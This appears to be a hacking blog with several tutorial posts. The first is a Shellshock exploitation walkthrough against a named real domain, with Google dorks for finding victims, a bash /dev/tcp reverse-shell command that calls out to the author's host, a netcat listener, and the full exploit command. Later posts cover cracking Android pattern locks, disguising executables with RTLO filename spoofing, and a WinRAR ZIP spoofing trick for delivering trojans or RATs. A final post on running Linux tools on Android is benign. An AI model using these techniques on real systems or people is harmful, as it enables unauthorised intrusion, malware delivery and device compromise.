Saturday, 27 September 2014

How to exploit a shellshock vulnerability to get a reverse shell

bash shellshock exploit

In this tutorial, i would show how to exploit a BASH Shellshock vulnerability successfully and getting a reverse shell while keeping ourself anonymous.

Who is vulnerable to shellshock??:

CGI scripts using bash variables or commands and CGI scripts written in bash can be exploited remotely. Moreoever, any service listeing on a port and using bash script or its variables in its coding can also be exploited using this vulnerability.

Requirements:

1- Shellshock vulnerable victim
2- Router or USB modem having port forwarding Feature
3- Download exploit for shellshock from here
4- Netcat
5- PHP

Google Dorks:

We can find our vulnerable victim using google dorks. Mostly, all cgi scripts written in bash uses a .sh file extension. So, following google dorks can given you good results.

inurl:/cgi-bin/ ext:sh
inurl:/cgi-bin/ ext:cgi

Vulnerable Victim:

In our tutorial victim is following domain:

http://supreme.adisseolabservice.com/cgi-bin/wslb.sh

Port Forwarding:

Open your router or usb modem settings and forward port 4444 for your LAN IP.

noip Domain for anonymity: 

This step is optional and it just provides a little bit more anonymity in our penetration testing scenario.
1- Visit noip.com and register an account.
2- Now go in your account and go in Manager Hosts. There add free domain name with your public IP.
This setting will take almost 1 minute to apply. After one minute you can ping your domain name and can verify that it is resolving to your public IP. Now we will use this domain name for our reverse shell.  
Here i have registerd a domain logon.myftp.org for getting a reverse shell.
So lets perform it.

/dev/tcp Linux Native Reverse Shell:

We will try to use the /dev/tcp for reverse shell because every linux system have it.

/bin/bash -i >& /dev/tcp/logon.myftp.org/4444 0>&1

OR

/bin/bash -i >& /dev/tcp/UR_PUBLIC_IP/4444 0>&1

NOTE: forward your port 4444 for your LAN IP otherwise it won't work for you.

Verification of vulnerable victim:

Open CMD and go in the directory where you downloaded the exploit from exploit-db.
Now type following command to run this exploit.
php bash_mod_cgi_script.php
It will show u an out saying that give me url and command.
So use the above given URL of victim and try to use any linux system command i.e. ls, whoami etc.
If you see command sent to server then it means server is receiving our command but it can't send back any response. 

shellshock vulnerable response

So, lets try to do a work around and get a reverse shell.

Netcat Reverse Shell Handler:

Now we need to run netcat listening on a port so that we may get a reverse shell.So, start a netcat listening on ur system with this command:
nc -lp 4444 -vv
-vv is used for verbosity and more information
-l is for listening with netcat
-p is used for a custom port on which we want to listen

Now we are all set, just run the following command and wait untill you receive a reverse shell on your netcat reverse handler.
php bash_mod_cgi_script.php -u http://supreme.adisseolabservice.com/cgi-bin/wslb.sh -c "/bin/bash -i >& /dev/tcp/logon.myftp.org/4444 0>&1"

Watch Video Tutorial:

Thursday, 14 August 2014

How To Crack The Android Gesture Pattern Lock

android gesture pattern cracked

In this tutorial I am going to demonstrate that how to crack the Gesture Pattern of ROOTED android devices.
This tutorial doesn't seem very effective in attacking some victim but it is good for those who want to try it on some android device after getting a metasploit meterpreter session.

How Gesture Pattern Lock Works??

Well first of all we need to understand that how gesture pattern works. Patterns are nothing but the path traced by the fingers on the nine circles with the number starting from 1 to 9 from top-left corner to the right bottom corner as shown in the figure below.

android gesture pattern

If we select a pattern 1478, the pattern would look like the following figure.

android gesture pattern keys
Gesture pattern is encrypted as a SHA-1 hash without a salt in gesture.key file at /data/system/gesture.key .

Tools Required:

1- ADB shell
2- ROOTED android device
3- Gesture Pattern SHA-1 dictionary and script to compare those hashes

1- First of all, enable usb debugging in your mobile's settings and connect your cell phone with your pc so that we may copy the gesture.key file for decryption purpose.

2- Download ADB shell from ADB official site and extract it on your drive. Open cmd, go to adb folder and execute the following command.

gesture key copied with adb shell

3- Now download the Gesture Pattern SHA-1 dictionary and python script from the above given links and extract those on your drive. Then execute the following command.


From the above image you can see the decrypted Gesture Pattern which is 14569.

NOTE:
This attack hardly takes 1-2 seconds as total number of possible patterns are only 9,85,825.

Monday, 4 August 2014

RTLO/RLO (right to left override) technique for file extension spoofing

RTLO/RLO (right to left override technique)

Salam everyone..!!
In this tutorial i will show you RTLO/RLO (right to left override) technique which is used for file extension spoofing.
This technique is used by many infamous malwares i.e GameOverZeus With this technique you can show your exe file as pdf, ppt, docx or whatever file extension you want to show to your victim.

Tools needed:

1- unicodeinput freeware utility
2- CFF explorer (to change icon of .NET exe file)

I am using winmd5 .NET file as a sample exe for demonstration purposes in this tutorial.

Brief intro: 

The RTLO/RLO character (U+202e in unicode) is designed to support languages that are written right to left, such as Arabic and Hebrew. The problem is that this override character also can be used to make a malicious file look innocuous. An increasing number of email based attacks are taking advantage of the RTLO/RLO character to trick users who have been trained to be wary of clicking on random .exe files.
For example consider the following file name
“winmd5exe.pdf”
It is encoded with RTLO/RLO unicode character. It looks like a pdf document but in fact it is an exe file in which we have placed a unicode character in its name right after winmd5 i.e winmd5[RTLO character]fdp.exe . After that RTLO unicode character file name will be read like this exe.pdf (from right to left character by character upto dot(.) symbol, means fdp will be inverted to pdf).
I hope you got my point. Similarly, you can use the following RTLO file name to run a batch file as pdf.
"winmd5[RTLO]fdp.bat" 

NOTE: Real content type of the file can be viewed from file properties.

Watch Video Tutorial:

Sunday, 4 May 2014

Winrar File Extension Spoofing 0day

winrar file extension spoofing oday

In March 2014, winrar file extension spoofing 0day was used wildly to hack many windows users.
In this tutorial, i will explain this vulnerability with some POC images and video created by my friend Gujjar-Haxor (Pak Cyber Pirates).

Vulnerability Description:

The file names showed in WinRAR when opening a ZIP file come from the central directory, but the file names used to extract and open contents come from the Local File Header. This inconsistency allows to spoof file names when opening ZIP files with WinRAR, which can be abused to execute arbitrary code. 

NOTE:

This tutorial is found working under windows 7 environment. For some reasons , it didn't work for my friends using windows 8. So, try it on win 7 if it doesn't work for you on win 8. Thanks.

POC:

1- Get a portable executable file. In this tutorial, i am using havij software which is an sql injection tool but you can use some trojan or RAT to infect the victim.

2- Right click on this exe file and click on "Add to archive". Choose ZIP archive format to compress this file into a ZIP archive.

3- Run Hex Editor , Hex workshop or any hex editor and open this compressed ZIP archive in it. Go to the end of hex editor and find havij.exe and rename its extension to jpg like this havij.jpg.

winrar zip file extesion spoofing


4- Now open this zip archive. You will see havij.jpg icon in the archive. When you will double click it, it will run that havij.exe file. 
(This is just a demonstration, you can use your own metasploit payload, trojan or RATs instead of this havij.exe file)

Watch Video Tutorial:


Saturday, 1 February 2014

How To Install Your Favorite Linux Distro And Pentesting Tools Over Android

run linux over android

Salam everyone, in this tutorial i am going to show you how to install your favorite Linux distro over rooted android devices.

Note:
Device Used For This Tutorial Is ROOTED Samsung Galaxy S3

Requirements:

  • Rooted Android Device
  • At least 4GB Disk Space
  • Linux Deploy
  • Wifi Connection

Steps:

1- Download and install Linux Deploy from android market.

2- Run Linux Deploy with super user permissions and tap the download icon to go to configuration page.

deploy linux configuration page

3- On configuration page, choose your favorite distro and its release. Choose a user name. If you won't edit username field then you will have default username which is "android".
Now move to the top of the page and tap the Install option to start the downloading.

installation of linux using deploy linux

4- Let the installation complete. On successful installation, you will see the following output.

installation of linux distro completed over linux deploy

5- Now tap the Start button to start your Linux distro.

linux running over deploy linux

6- Congrats ..!! now Linux is running over Linux Deploy console. So, now lets connect to it and test it.

Default Credentials:

Username:android
Password:changeme

How to Connect With Deploy Linux:

You can use following two method to use connect to your Linux Deploy machine.

Connect Using SSH Client:

1- Download any good ssh client to connect to your linux machine. I am using here JuiceSSH.

2- Use the above given default credentials and connect to your localhost. On successful connection, you will something like the following image.

ssh to deploy linux machine using juice ssh

Connect Using VNC Client:

1- Download any good VNC client and connect to your tightvncserver of Deploy Linux console. I am using here bVNC.

2- Use the default credentials and connect to your vnc server. On successful connection, output will appear like the following image.

bvnc client connected to linux deploy

Penetration Testing Tools:

I have tried the following four tools over this ubuntu-saucy environment and they worked like a charm.

Metasploit Exploitation Framework:

metasploit over android

system exploited using android metasploit

WPScan (Wordpress Vulnerability Scanner):

WPScan wordpress scanner over android

Sqlmap (SQL Injection Tool):

sqlmap sql injection tool over android

Nmap (Network Vulnerability Scanner):

nmap network vulnerability scanner over android

Remember me in your prayers and use your knowledge to benefit people.
(exploiter-z)